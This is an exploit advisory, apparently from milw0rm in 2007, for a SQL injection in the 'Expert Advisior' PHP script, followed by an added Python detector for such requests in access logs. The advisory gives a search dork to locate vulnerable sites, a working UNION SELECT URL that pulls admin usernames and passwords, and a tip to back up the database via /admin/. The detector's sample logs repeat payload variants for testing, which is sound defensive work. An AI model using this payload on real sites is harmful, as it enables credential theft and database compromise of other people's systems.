--==+================================================================================+==--
--==+ Expert Advisior SQL Injection Vulnerability +==--
--==+================================================================================+==--


AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: intitle:"Answer Builder" Ask a question


DESCRIPTION:
pull out admin user/pass from the database


EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
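
DETECTION EXAMPLE (added here, not part of the original advisory or the product's code):
A log check for requests of the shape shown above, where /**/ comments stand in for spaces inside the id parameter. It assumes cmd and id only ever carry integers (as in cmd=4&id=1) and an Apache-style access log; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Closed /**/ comments, plus an unterminated /* that swallows the query's tail.
INLINE_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
SQL_TOKENS = re.compile(r"\b(?:union|select|from|concat)\b|@@\w+|0x[0-9a-f]+", re.I)

def normalize(value):
    """Turn MySQL inline comments (used in place of spaces) into single spaces."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).strip()

def inspect_request(url, numeric_params=("cmd", "id")):
    """Return (param, reason) for each assumed-numeric parameter that is not an integer."""
    findings = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # also URL-decodes
    for name in numeric_params:
        for raw in query.get(name, []):
            if raw.isascii() and raw.isdigit():
                continue
            cleaned = normalize(raw)
            hits = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(cleaned)})
            findings.append((name, "sql-tokens:" + ",".join(hits) if hits else "non-numeric"))
    return findings

def scan_log(lines):
    """Return (line_number, param, reason) for each suspicious request in the log."""
    results = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            results += [(number, p, r) for p, r in inspect_request(match.group(1))]
    return results

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Jul/2007:10:01:02 +0000] "GET /Script_Path/index.php'
    '?cmd=4&id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Jul/2007:10:03:44 +0000] "GET /Script_Path/index.php'
    '?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,@@version/**/FROM/**/admin/* HTTP/1.1" 200 7312',
    '198.51.100.9 - - [17/Jul/2007:10:04:10 +0000] "GET /Script_Path/index.php'
    '?cmd=4&id=1%2F%2A%2A%2FUnIoN%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1 HTTP/1.1" 200 7312',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same integer-only assumption is what the application itself should enforce on id before the value reaches a query.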


NOTE/TIP:
admin login is at /admin/; you can back up the DB there.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+ Expert Advisior SQL Injection Vulnerability +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-17]
Expert Advisior index.php id Remote SQL Injection Vulnerability
t0pP8uZz
07/17/2007